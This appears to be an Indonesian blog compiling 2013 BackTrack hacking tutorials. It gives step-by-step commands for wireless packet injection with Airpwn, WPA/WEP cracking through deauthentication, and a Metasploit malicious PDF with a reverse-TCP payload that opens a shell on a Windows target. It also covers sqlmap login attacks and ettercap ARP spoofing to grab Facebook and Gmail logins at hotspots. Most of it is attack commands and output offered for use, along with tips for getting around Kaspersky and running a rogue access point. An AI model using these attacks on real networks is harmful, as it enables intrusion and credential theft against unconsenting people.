Minggu, 28 April 2013

Airpwn Installation on Backtrack 5 / 5R1

Airpwn Installation on Backtrack 5 / 5R1

Airpwn adalah sebuah framework untuk wireless packet injection. Airpwn mendengarkan pada wireless packet yang berada di udara dan mencocokkan dengan pola yang telah ditentukan pada konfigurasi file lalu menginjeksikan konten yang telah dimodifikasi oleh penyerang sehingga seolah-olah berasal dari akses poin.
Requirements:
  • Wireless card yang support monitor mode dan packet injection
Dependencies: Steps to install:
Spoiler for download dan extract airpwn:
Code:
wget http://nchc.dl.sourceforge.net/project/airpwn/airpwn/1.4/airpwn-1.4.tgz
tar xzvf airpwn-1.4.tgz
cd airpwn-1.4/
Spoiler for install LORCON (masih didalam direktori airpwn-1.4):

Code:
tar xzvf lorcon-cuurrent.tgz
nano /usr/include/linux/wireless.h
cari string
Code:
#ifndef _LINUX_WIRELESS_H
#define _LINUX_WIRELESS_H
tambahkan dibawahnya
Code:
#include <linux/if.h>
save lalu masuk ke direktori lorcon
Code:
cd lorcon/
./configure
make
make install
Spoiler for install airpwn(masih didalam direktori lorcon:
Code:
cd ..
./configure
make
make install
Test Drive: :D
Spoiler for test drive packet injection:

root@bt:~# airmon-ng stop wlan0
root@bt:~# airmon-ng start wlan0 11
root@bt:~# aireplay-ng --test mon0
15:06:21 Trying broadcast probe requests...
15:06:21 Injection is working!
15:06:22 Found 1 AP

15:06:22 Trying directed probe requests...
15:06:22 00:08:9F:80:8B:37 - channel: 11 - 'Keloran Ceria'
15:06:22 Ping (min/avg/max): 0.779ms/2.176ms/4.507ms Power: -38.90
15:06:22 30/30: 100%

Spoiler for Airpwn session :D:

Quote:
root@bt:~# airpwn -h
usage: airpwn -c <conf file> -d <driver name> [interface options] [options]
<conf file> : configuration file
<driver name> : supported wireless driver name

Interface options:
You can use -i to set all 3 interfaces at once, or use the
other options to set each interface individually.
-i <iface> : sets the listen/control/inject interface
-M <iface> : sets the listen (monitor) interface
-C <iface> : sets the control interface
-I <iface> : sets the injection interface

Optional arguments:
-l <logfile> : log verbose data to a file
-f <filter> : bpf filter for libpcap
-F : assume no FCS values from the monitored interface
-m <max> : Specify the maximum data chunk size (MTU - headers)
-k <WEP key>: key to use to de/encrypt WEP packets. You can
use this option multiple times to specify multiple WEP keys.
-v : increase verbosity (can be used multiple times)
-h : get help (this stuff)

Supported drivers are: wlan-ng hostap airjack prism54 madwifing madwifiold rtl8180 rt2570 rt2500 rt73 rt61 zd1211rw bcm43xx mac80211
Quote:
root@bt:~# airpwn -c testconf -d iwl4965 -i mon0 -vvv
Parsing configuration file..
Opening command socket..
Opening monitor socket..
Opening injection socket..
LORCON - tx80211_setmode(...) is deprecated, please use tx80211_setfunctionalmode(...) instead
Listening for packets...
Channel changing thread starting..
data packet len: 1286, flags: 17 --> DS
Matched pattern for conf 'greet_html'
wrote 256 bytes to the wire(less)
[15:18:28] injecting data for conf 'greet_html' <--- BINGO!
POC:
Spoiler for pic hape Palm Treo Pro WM6.1:

Maaf gambarnya burem banget. soalnya cuman pake webcam laptop
edit:
buat yg dapet error
Code:
airpwn: error while loading shared libraries: liborcon-1.0.0.so: cannot open shared object file: No such file or directory
silahkan ikutin langkah dibawah ini.
Quote:
Originally Posted by ubiqcx View Post
sekedar menambahkan, ane coba step by step tuts diatas. Compile berhasil hanya saja pada saat menjalankan :
Code:
# airpwn 
airpwn: error while loading shared libraries: liborcon-1.0.0.so: cannot open shared object file: No such file or directory
Solusi :
Code:
# ln -s /usr/local/lib/liborcon* /usr/lib
semoga berguna
more googling to do

Hack WPA(wi-fi protected access)

Hack WPA(wi-fi protected access)

Untuk kracking WPA/WPA2 ada sedikit perbedaan dari WEP karena kita membutuhkan wordlist dan mendapatkan handshake dari host target.
mengubah interface menjadi monitoring mode
Quote:
airmon-ng start wlan0
monitoring target
Quote:
airodump-ng -c <channel> --bssid <bssid target> -w psk <interfaces>
sambil monitoring buka terminal baru

memutuskan koneksi client (deauth client)
Quote:
aireplay-ng --deauth 90 -a <bssid> -c <station id> <interfaces>
setelah koneksi putus tunggu client melakukan koneksi ulang. tunggu sampai dapat handshake. Jika udah dapet handshake tahap ini bisa langsung di lewatin

Klo handshake sudah didapat langsung di krack
Quote:
airkrack-ng -w /pentest/passwords/wordlist/<pilih salah satu dictionarynya> -b <bssid> psk*.cap
Untuk wordlist lebih enaknya sih pake wordlist indo, soalnya kita coba pentest di indo
good luck
 

krack WEP

krack WEP(wired equivalent privacy)

Untuk mengetahui apa itu mekanisme security WEP googling aja yah klo sudah tau mari langsung di krack.
Untuk memulainnya ubah dulu interface menjadi monitoring mode
Quote:
airmon-ng stop <interface>
airmon-ng start <interface>
Abis itu coba scanning target
Quote:
airodump-ng -w iseng.wep --channel <channel> <interface>
iseng.wep itu untuk file capture

Klo sudah dapat target, coba putusin koneksi client ke AP
Quote:
aireplay-ng --fakeauth 0 -e <essid target> -a <bssid target> -h <stasion target> <interface>
Setelah terputus kita kumpulkan paket data dari target
Quote:
aireplay-ng --arpreplay -b <bssid target> -h <station target> <interface>
Pada saat mengumpulkan paket data tunggu sampai file .cap nya cukup kira-kira 300 mb kurang lebih, klo sudah cukup tinggal CTRL+C

Jika paket data sudah terkumpul, langsung krack paket datanya
Quote:
airkrack-ng -b <bssid> praktek*.cap
Pada saat melakukan krack waktu cepat atau lambat tergantung dari processor dan banyaknya paket data yang diambil

ini tulisan krack ko jadi krek mulu sih
good luck

metasploit 4

untuk pengguna metasploit 4 (yang official dari repo Backtrack, bukan download dari rapid7) ini ada cara untuk mengatasi Failed to connect to the database ternyata seperti dugaan ane kemaren, si user msf3 ini belum dibuatin role di server database postgresql nya. waktu dicek ternyata cuman ada user postgres.
sebenernya kita bisa sih langsung connect pake database punya user postgres dengan memodifikasi file /opt/metasploit/config/database.yml pake detail user postgres yang ada di /opt/metasploit/properties.ini
tapi biar afdol aja metasploit kok connectnya ke database postgres  kudunya msf3 dong

STEPS:
Code:
root@bt:~# cd /opt/metasploit/postgresql/bin/

root@bt:/opt/metasploit/postgresql/bin# ./createuser -PE msf3

Enter password for new role: (password msf3)

Enter it again: (password msf3)

Shall the new role be a superuser? (y/n) y

Password: (password postgres)

root@bt:/opt/metasploit/postgresql/bin# ./createdb --host=localhost --port=7337 --user=msf3 msf3dev

Password: (password msf3)


*)Untuk password msf3 & password postgres bisa diliat di: /opt/metasploit/properties.ini

kalo pengen liat user sama database yang udah dibikin
Code:
root@bt:/opt/metasploit/postgresql/bin# su postgres psql

Password: (password postgres)

psql.bin (8.4.0)

Type "help" for help.



postgres=# \du

postgres=# \l

Client Side Attack with Evil

Ubuntu for PenTest - Client Side Attack with Evil .pdf

Ingin kembali melakukan repost dari tutorial sendiri di thread yang udah di-closed...
Spoiler for tutz:

Pada kesempatan kali ini, ane ingin coba sedikit berbagi trik dari sekian trik yang ada dalam Client Side Attack...
Inti serangan ini memanfaatkan kelemahan dari pengguna yang dijadikan target, misalnya terlalu percaya dengan kiriman dokumen2 yang tidak jelas atau tidak meng-update sistem keamanan yang ada pada komputer nya..
Quote:
Untuk bahan persiapan :
  • OS : BackTrack 5 (bisa juga 4, 3 atau 2) --> Bebas selama tools di bawah ini tersedia...
  • Metasploit...
  • File .pdf asli (bebas untuk ukuran dan file nya)...
  • Secangkir teh untuk menunggu target...
  • Dan tentunya target dengan Windows OS...
Code:
Pengujian dilakukan di dalam Virtual Machine... :)
IP Attacker : 192.168.1.215
IP Target : 192.168.1.50
1. Langkah awal, masuk ke konsole metasploit melalui terminal (dalam mode root yach) dan ketikan perintah :
Code:
root:/opt/framework-3.7.0/msf3# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.215 LPORT=443 X > /tmp/nama_program.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.1.215,LPORT=443
/** Dengan perintah di atas, maka kita terlebih dahulu membuat program yang sudah berisikan payload yang tentunya terdapat IP kita...  program ini disimpan dalam direktori /tmp/ seperti yang tertulis pada perintah di atas...
*/


2. Lanjutkan dengan meng-copy-kan file .pdf yang asli ke direktori /tmp...
3. Lalu, masuk ke Metasploit :
Code:
root:/opt/framework-3.7.0/msf3# msfconsole[/quote]

4. Pada Metasploit, gunakan module adobe pdf embedded exe dan buat file fake.pdf nya (perhatikan saja langkahnya) :
[quote]msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.215
LHOST => 192.168.1.215
msf exploit(adobe_pdf_embedded_exe) > set LPORT 443
LPORT => 443
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /tmp/nama_program.exe
EXENAME => /tmp/payload.exe
msf exploit(adobe_pdf_embedded_exe) > set FILENAME FakeFile.pdf
FILENAME => FakeFile.pdf
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /tmp/OriginalFile.pdf
INFILENAME => /tmp/OriginalFile.pdf
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /tmp/
OUTPUTPATH => /tmp/
msf exploit(adobe_pdf_embedded_exe) > exploit

Started reverse handler on 192.168.1.215:443
Reading in '/tmp/OriginalFile.pdf'...
Parsing '/tmp/OriginalFile.pdf'...
Parsing Successful.
Using '/tmp/nama_program.exe' as payload...
Creating 'FakeFile.pdf' file...
Generated output file /tmp/FakeFile.pdf
Exploit completed, but no session was created.
/** Perhatikan bahwa Payload yang di-set pada module ini harus sama dengan Payload yang kita sett sebelumnya di awal... Kemudian hasil keluaran dari perintah ini akan berupa FakeFile.pdf yang akan berada pada direktori /tmp...
*/


5. Lanjutkan dengan menunggu target untuk membuka file FakeFile.pdf... Namun, persiapkan dulu hal ini :
Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.215
LHOST => 192.168.1.215
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

Started reverse handler on 192.168.1.215:443
Starting the payload handler...

Sending stage (240 bytes) to 192.168.1.50
Command shell session 1 opened (192.168.1.215:443 -> 192.168.1.50:1042)


Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
Spoiler for solusi:

Untuk solusi penanganan hal ini :
Update lah selalu AntiVirus Anda... Simple kan?
Tanda2 mencurigakan dari file ini terletak pada saat kita membukanya... Saat kita buka file palsu ini, maka dia akan mengeluarkan warning ynag mengatakan file original nya tidak ada, apakah mau dipisah atau tidak... Dipisah di sini maksudnya melepas payload yang telah kita masukan sebelumnya ke file asli sehingga nanti akan keluar file aslinya tanpa payload di dalamnya...
Namun, ketika hal ini telah dilakukan, maka attacker telah berhasil masuk ke sistem target seperti yang telah dijelaskan di atas... Jadi, bila bertemu situasi seperti ini, lebih baik lupakan saja untuk membukanya atau buka dalam keadaan Anda tidak terhubung ke InterNet... 

Sniffing

Quote:Original Posted By Pisang.gor3ng


oh ya gan itu kalo di artikelnya menggunakan flag --method sedangkan di sqlmap pada bt 5 gak ada command

--method nah trus kita make apa ya?

langsung --data
ex :
Quote:python sqlmap.py -u "http://url.com/login.php" --data "username=User&pass=password&Submit=submit" --threads 10 --random-agent
Quote:Original Posted By aryuki
mastah ane mw tanya seputar ettercap..
kebetulan ane coba tuts agan murray_here yg ini

Code:
ettercap -Tq -i wlan0 -M arp:remote -P arp_cop /ip_router/ //

dan berjalan dengan baik.. dan ane dpet tuts dri gugel yg punya fungsi sama..
kyk ini:
Code:
echo '1' > /proc/sys/net/ipv4/ip_forward

arpspoof -i interface ip_ruter

ettercap -T -q -i 'interface 

kedua tut tersebut berjalan dengan baik, tp klo diliat dr pndangan nubie lbh simpel tuts nya agan murray_here.. yg jd pertanyaan.. apa kelebihan dan kekurangan dari masing2 tuts diatas..??
dan 1 lg, apa perlu settingan di /etc/etter.conf iptables nya diaktifin(diilangin pagernya #)???

mohon maaf klo salah kata..

ngilangin tanda pager / aktifin command iptables di ettercap.conf itu dibutuhkan saat ettercap dipake untuk tekhnik man in the middle attack,

contoh dns spoofing.

dns spoofing akan mengganti setiap request dns menjadi ip attacker, dan disini akan diperlukan nya ip forwarding untuk forward paket data.

sama hal nya juga kalo lagi ssl sniff.

nge uncomment / ngilangin tanda pagar di etter.conf itu hanya dilakukan sekali saja, gak perlu berulang kali.

actually ngilangin tanda pagar itu seriously needed.

Quote:Original Posted By IkhsanBurhanAli

hehehe...makasih gan reply-annya

tapi maksud ane bukan cara protect-nya gan, tapi ane mo tahu kenapa sniffing ane ga berhasil
yang ane sniffing sih pake firewall dari windows, ada yang pake eset smart security / antivirus, ada juga yang pake kaspersky internet security. jadi kemungkinan kaspersky itu yah yang bikin sniffing gagal ?

ada cara lain ga gan buat nembus si KIS ini ?


duh pertanyaan lo sebelumnya itu gak jelas gan, gw jadi salah jawab dah hahaha.

kalo mau nanya kayak curhat aja napa gan, panjang panjang sekalian, gak paham gak paham sekalian, jangan setengah2
sebenernya, sniffing / spoofing itu old style,. apalagi itu udah termasuk ke dalam ancaman yang ditanggapi serius sama vendor antivirus dan firewall.

sekarang tekhnik lebih ampuh itu menyamar jadi router, dengan cara sebenar benar nya. gw kasih skenario nya aja ya.

wlan0 -> konek internet lancar
wlan1 -> bikin akses point dengan teknik piggybacking

redirect semua traffic dari wlan1 ke wlan0, backtrack setup dhcp gateway, redirect port 80 ke paros proxy / aplikasi logging traffic lainnya. tunggu, nikmatin hasil.

yang kayak begini, biar target mau pake firewall / antivirus macam apa juga, kalo dia gak ngeh lagi konek ke akses point / gateway attacker pasti kena ke sniff.

ettercap sniffing

ini yang biasa dilakuin di hotspot,
untuk dapetin account facebook, twitter, email ym, gmail dan lain masuk

Code:
ettercap -Tq -i wlan0 -M arp:remote -P arp_cop /ip_router/ //
setelah jalan jangan lupa pencet P lalu tulis auto_add biar target / victim nya otomatis nambah di list ip nomor 2